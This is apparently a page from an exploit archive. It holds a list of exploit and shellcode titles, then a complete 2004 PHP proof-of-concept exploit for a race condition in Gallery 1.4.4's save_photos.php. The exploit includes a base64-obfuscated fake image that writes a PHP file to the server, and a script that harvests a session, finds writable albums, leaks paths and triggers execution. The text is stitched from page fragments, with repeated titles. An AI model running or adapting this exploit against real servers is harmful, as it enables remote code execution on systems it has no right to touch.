880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
135 lines
No EOL
4.7 KiB
PHP
135 lines
No EOL
4.7 KiB
PHP
source: https://www.securityfocus.com/bid/10968/info
|
|
|
|
A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.
|
|
|
|
The issue presents itself becuase the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.
|
|
|
|
Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well.
|
|
|
|
This is the content of galfakeimg.php. It has to be placed in a
|
|
remote web directory accessible by the gallery script.
|
|
|
|
---8-<-------------------------8-<-------------------------8<---
|
|
<?php
|
|
echo "<?php
|
|
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcy
|
|
BnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);
|
|
?>\n";
|
|
for($x=0;$x<65535;$x++) echo " \n";
|
|
while(1){}
|
|
?>
|
|
---8-<-------------------------8-<-------------------------8<---
|
|
|
|
*/
|
|
|
|
|
|
define( XEC_TIMEOUT, 5);
|
|
|
|
echo "+--------------------------------------------------------------+\n|
|
|
Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept |\n| By
|
|
aCiDBiTS acidbits@hotmail.com 17-August-2004
|
|
|\n+--------------------------------------------------------------+\n\n";
|
|
|
|
|
|
if($argc<3) die("Usage: ".$argv[0]." URL_to_fake_photo
|
|
URL_to_Gallery\n\n");
|
|
$host=$argv[2];
|
|
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
|
|
$fakephoto=$argv[1];
|
|
|
|
echo "[+] Obtaining PHPSESSID ... \n ";
|
|
$webc=get_web($host."view_album.php?set_albumName=".$album[0], 1, '');
|
|
$temp=explode("PHPSESSID=",$webc);
|
|
$temp1=explode(";",$temp[1]);
|
|
$phps="PHPSESSID=".$temp1[0].";";
|
|
echo $phps;
|
|
|
|
echo "\n\n[+] Getting album names ...\n ";
|
|
$webc=get_web($host, 0, $phps);
|
|
$temp=explode("set_albumName=",$webc);
|
|
$nalbum=0;
|
|
while($temp[($nalbum*2)+1]){
|
|
$temp1= explode( "\"", $temp[($nalbum*2)+1]);
|
|
$album[$nalbum]=$temp1[0];
|
|
echo $album[$nalbum]." ";
|
|
$nalbum++;
|
|
}
|
|
if(!$nalbum) die(" Failed!\n\n");
|
|
|
|
|
|
echo "\n\n[+] Searching an album with permissions to add photos ...";
|
|
$walbum='';
|
|
foreach( $album as $temp){
|
|
$webc=get_web($host."view_album.php?set_albumName=".$temp, 0, $phps);
|
|
$webc=send_post( $host."save_photos.php",
|
|
urlencode("urls[]=".$host."&setCaption=1"), $phps);
|
|
echo "\n ".$temp." -> ";
|
|
if( ereg( "You are no allowed to perform this action", $webc) )
|
|
echo "No";
|
|
else {
|
|
echo "Yes";
|
|
$walbum=$temp;
|
|
}
|
|
}
|
|
if( !$walbum ) die ("\n\nFailed! No permissions in any album.\n\n");
|
|
echo "\n Using: ".$walbum;
|
|
|
|
echo "\n\n[+] Getting gallery & temporal directory paths ...";
|
|
$webc=get_web($host."view_album.php?set_albumName=".$walbum, 0, $phps);
|
|
$temp='/';
|
|
for($x=0;$x<256;$x++) $temp.='a';
|
|
$webc=send_post( $host."save_photos.php",
|
|
urlencode("urls[]")."=".urlencode($fakephoto.$temp)."&setCaption=1", $phps);
|
|
$temp=explode("fopen(\"",$webc);
|
|
$temp1=explode("photo",$temp[1]);
|
|
$tmpd=$temp1[0];
|
|
echo "\n Temporal directory: ".$tmpd;
|
|
$temp=explode("resource in <b>",$webc);
|
|
$temp1=explode("save_photo",$temp[1]);
|
|
$scrptd=$temp1[0];
|
|
echo "\n Gallery directory: ".$scrptd;
|
|
|
|
if( !ereg( $scrptd, $tmpd) ) die ("\n\nTemporal directory is out of
|
|
gallery's webtree. Can't continue.\n\n" );
|
|
|
|
$temp=explode("/",$fakephoto);
|
|
end($temp);
|
|
$sname=current($temp);
|
|
echo "\n\n[+] Uploading $sname and executing it ...";
|
|
$webc=send_post( $host."save_photos.php",
|
|
urlencode("urls[]")."=".urlencode($fakephoto)."&setCaption=1", $phps);
|
|
//Maybe you'll need to wait some more seconds, check XEC_TIMEOUT
|
|
$webc=get_web($host.str_replace($scrptd,'',$tmpd)."photo.".$sname, 0,
|
|
$phps);
|
|
|
|
echo "\n\n Now go to: ".$host.str_replace($scrptd,'',$tmpd)."test.php";
|
|
|
|
die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\//||\\\\\n\n");
|
|
|
|
|
|
function get_web($url, $h, $cookie)
|
|
{
|
|
$ch=curl_init();
|
|
curl_setopt ($ch, CURLOPT_URL, $url);
|
|
curl_setopt ($ch, CURLOPT_HEADER, $h);
|
|
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
|
|
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
|
|
$data=curl_exec ($ch);
|
|
curl_close ($ch);
|
|
return $data;
|
|
}
|
|
|
|
function send_post($url,$data, $cookie)
|
|
{
|
|
$ch=curl_init();
|
|
curl_setopt ($ch, CURLOPT_URL, $url );
|
|
curl_setopt ($ch, CURLOPT_HEADER, 0);
|
|
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
|
|
curl_setopt ($ch, CURLOPT_POST, 1);
|
|
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
|
|
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
|
|
curl_setopt ($ch, CURLOPT_TIMEOUT, XEC_TIMEOUT) ;
|
|
$data=curl_exec ($ch);
|
|
curl_close ($ch);
|
|
return $data;
|
|
}
|